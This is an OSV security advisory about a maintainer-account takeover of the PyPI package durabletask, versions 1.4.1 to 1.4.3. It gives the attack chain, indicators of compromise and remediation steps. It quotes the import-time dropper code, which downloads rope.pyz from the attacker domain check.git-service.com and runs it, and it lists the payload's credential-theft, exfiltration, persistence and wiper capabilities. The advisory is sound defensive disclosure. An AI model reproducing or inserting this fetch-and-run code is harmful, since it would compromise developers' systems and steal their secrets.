MAL-2026-4174

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/durabletask/MAL-2026-4174.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4174
Aliases
Published
2026-05-19T16:47:48Z
Modified
2026-06-10T08:41:31.355532974Z
Summary
Malicious code in durabletask (PyPI)
Details

1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to <=1.4.0.

Attack chain

  • Stage 1 — Import-time dropper: on import, the package fetches a second-stage payload rope.pyz from check.git-service.com (160.119.64.3). The TLS certificate for this C2 was issued on 2026-05-16, indicating ~3 days of pre-attack staging.
  • Stage 2 — Credential-theft framework:
    • AWS / Azure / GCP IMDS interrogation and Secrets Manager dumps
    • Kubernetes lateral movement via in-cluster service-account tokens
    • HashiCorp Vault token extraction
    • Harvesting from 85 known filesystem credential paths
    • Brute-forcing of local password manager vaults
  • Exfiltration: stolen data is encrypted and shipped to the primary C2, with a dead-drop fallback that pushes encrypted blobs as GitHub commits (FIRESCALE-style egress).
  • Persistence: systemd unit pgsql-monitor.service.
  • Destructive payload: a geotargeted wiper activates on hosts identified as being located in Israel or Iran.

Indicators of compromise

  • C2 (primary): check.git-service.com160.119.64.3
  • C2 (secondary): t.m-kosche.com185.95.159.32
  • Dropped payload: rope.pyz
  • Persistence unit: pgsql-monitor.service

Recommended actions

  • Pin durabletask to <=1.4.0.
  • Block both C2 domains at network egress.
  • Treat any Linux system that imported 1.4.1 / 1.4.2 / 1.4.3 as fully compromised — rotate all reachable secrets and rebuild affected hosts.

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (daa176998359c04f9e002ff27fa947f12f08ddf49648ac7444ca894602317662)

On every import durabletask, the package's top-level __init__.py (lines 8-11) calls urllib.request.urlretrieve('https://check.git-service.com/rope.pyz', '/tmp/managed.pyz') and then subprocess.Popen(['python3', '/tmp/managed.pyz'], start_new_session=True) on Linux. The fetched zipapp is executed with no hash or signature verification, in a detached session. The destination check.git-service.com is a generic-git-service lookalike domain unrelated to the legitimate publisher of durabletask (Microsoft / microsoft/durabletask-python on github.com). The trigger is module import — not pip install — so install-phase sandboxes (pip download, pip wheel, build isolation) never observe the network activity; the dropper fires when the package is loaded in CI, production, or a developer's interpreter. The pattern (plaintext additive trailing block in __init__.py, Linux platform gate, .pyz staged to /tmp/ and handed to python3, lookalike git-<project>.com-style C2) matches a known import-time dropper campaign and is structurally indistinguishable from a stolen-publish-credential compromise of a legitimate package.

Source: kam193 (9c23380bb017a417e3f26575c5b96e32fb0bf11dec8314d16f8b979052748049)

Versions 1.4.1, 1.4.2, 1.4.3 were compromised.

During import of compromised versions, the malicious code is downloaded and executed. It exfiltrates all kinds of credentials and sensitive files, including data from secret and password managers, SSH keys, configuration files. Code tries to achieve a persistence via systemd unit.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-05-compr-durabletask

Reasons (based on the campaign):

  • files-exfiltration

  • exfiltration-env-variables

  • exfiltration-ssh-keys

  • exfiltration-cloud-tokens

  • Downloads and executes a remote malicious script.

  • exfiltration-credentials

  • persistence

  • compromised-package

Database specific 
{
    "iocs": {
        "domains": [
            "check.git-service.com",
            "git-service.com",
            "t.m-kosche.com",
            "m-kosche.com"
        ],
        "urls": [
            "https://t.m-kosche.com/rope.pyz",
            "https://check.git-service.com/rope.pyz",
            "https://check.git-service.com/api/public/version",
            "https://check.git-service.com/v1/models"
        ]
    },
    "malicious-packages-origins": [
        {
            "sha256": "d7cd06c24c677da1e7b5c2f4df3b2d696dfbcf8548357b512ed16c659c4c7b66",
            "import_time": "2026-05-19T17:50:11.360785891Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-19T16:47:48Z",
            "versions": [
                "1.4.1"
            ]
        },
        {
            "sha256": "9c23380bb017a417e3f26575c5b96e32fb0bf11dec8314d16f8b979052748049",
            "import_time": "2026-05-19T18:43:08.148362157Z",
            "source": "kam193",
            "modified_time": "2026-05-19T18:34:41Z",
            "versions": [
                "1.4.1",
                "1.4.2",
                "1.4.3"
            ],
            "id": "pypi/2026-05-compr-durabletask/durabletask"
        },
        {
            "sha256": "295bb15ad476455cabcf58b33fa9b8cb1ff65733d648de314703dd119c171741",
            "import_time": "2026-05-19T19:37:36.17794506Z",
            "source": "kam193",
            "modified_time": "2026-05-19T18:34:41Z",
            "versions": [
                "1.4.1",
                "1.4.2",
                "1.4.3"
            ],
            "id": "pypi/2026-05-compr-durabletask/durabletask"
        },
        {
            "sha256": "78c753d3badef7f806bd71d60c2bb890ccc969a3fb360596e2872ae580d135f8",
            "id": "IN-MAL-2026-003202",
            "source": "amazon-inspector",
            "modified_time": "2026-05-19T19:45:00Z",
            "versions": [
                "1.4.1"
            ],
            "import_time": "2026-05-19T20:39:30.315949543Z"
        },
        {
            "sha256": "70afb57cbcdb03eb986b0e6d3f0f32c2dfc696ca54ed063ac0c3dad1f323cbd6",
            "import_time": "2026-05-19T22:31:50.76999664Z",
            "source": "kam193",
            "modified_time": "2026-05-19T18:34:41Z",
            "versions": [
                "1.4.1",
                "1.4.2",
                "1.4.3"
            ],
            "id": "pypi/2026-05-compr-durabletask/durabletask"
        },
        {
            "sha256": "daa176998359c04f9e002ff27fa947f12f08ddf49648ac7444ca894602317662",
            "import_time": "2026-05-26T05:50:53.879999909Z",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T17:45:34Z",
            "versions": [
                "1.4.1"
            ],
            "id": "IN-MAL-2026-003579"
        },
        {
            "sha256": "48304d20771195ab837cc038cbcd5efd2552d123b890df0dc57ccef477b7ee5d",
            "import_time": "2026-06-08T19:19:19.170034188Z",
            "source": "kam193",
            "modified_time": "2026-05-19T18:35:31Z",
            "versions": [
                "1.4.1",
                "1.4.2",
                "1.4.3"
            ],
            "id": "pypi/2026-05-compr-durabletask/durabletask"
        }
    ]
}
References
Credits

Affected packages

PyPI / durabletask

Package

Name
durabletask
View open source insights on deps.dev
Purl
pkg:pypi/durabletask

Affected ranges

Affected versions

1.*
1.4.1
1.4.2
1.4.3

Database specific

source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/pypi/durabletask/MAL-2026-4174.json"
cwes 
[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    },
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]
indicators 
{
    "domains": [
        "check.git-service.com",
        "t.m-kosche.com"
    ],
    "second_stage": [
        {
            "sha256": "069ac1dc7f7649b76bc72a11ac700f373804bfd81dab7e561157b703999f44ce",
            "url": "https://check.git-service.com/rope.pyz",
            "size_bytes": 28703.0,
            "persistence": {
                "binary_path_user": "~/.local/bin/pgmonitor.py",
                "binary_path_root": "/usr/bin/pgmonitor.py",
                "service_name": "pgsql-monitor.service"
            },
            "captured_at": "2026-05-19T19:43:50Z",
            "content_type": "application/zip",
            "observed_capabilities": [
                "Multi-cloud credential theft (AWS, GCP, Azure, Kubernetes, HashiCorp Vault)",
                "Filesystem secret harvesting (.env, SSH keys, browser credentials, password stores)",
                "RSA-OAEP + AES-256-GCM encrypted exfiltration to attacker C2",
                "GitHub dead-drop C2 resolution via signed commit messages (FIRESCALE pattern)",
                "Stolen GitHub token exfiltration fallback (creates public repos with encrypted data)",
                "Systemd persistence as pgsql-monitor.service (root or user-level)",
                "Propagation via secondary domain t.m-kosche.com",
                "Anti-analysis: Russia locale exclusion, CPU count > 2 requirement"
            ]
        }
    ],
    "evidence_files": [
        {
            "sha256": "5246e60c2ff10ae058abba14ef5ea22432465ad827ec5f5c5572999411d90b80",
            "path": "durabletask/__init__.py"
        }
    ],
    "ips": [
        "160.119.64.3"
    ],
    "package_integrity": [
        {
            "filename": "durabletask-1.4.1-py3-none-any.whl",
            "hashes": {
                "sha256": "7d80b3ef74ad7992b93c31966962612e4e2ceb93e7727cdbd1d2a9af47d44ba8"
            }
        },
        {
            "filename": "durabletask-1.4.1.tar.gz",
            "hashes": {
                "sha256": "3de04fe2a76262743ed089efa7115f4508619838e77d60b9a1aab8b20d2cc8bf"
            }
        }
    ]
}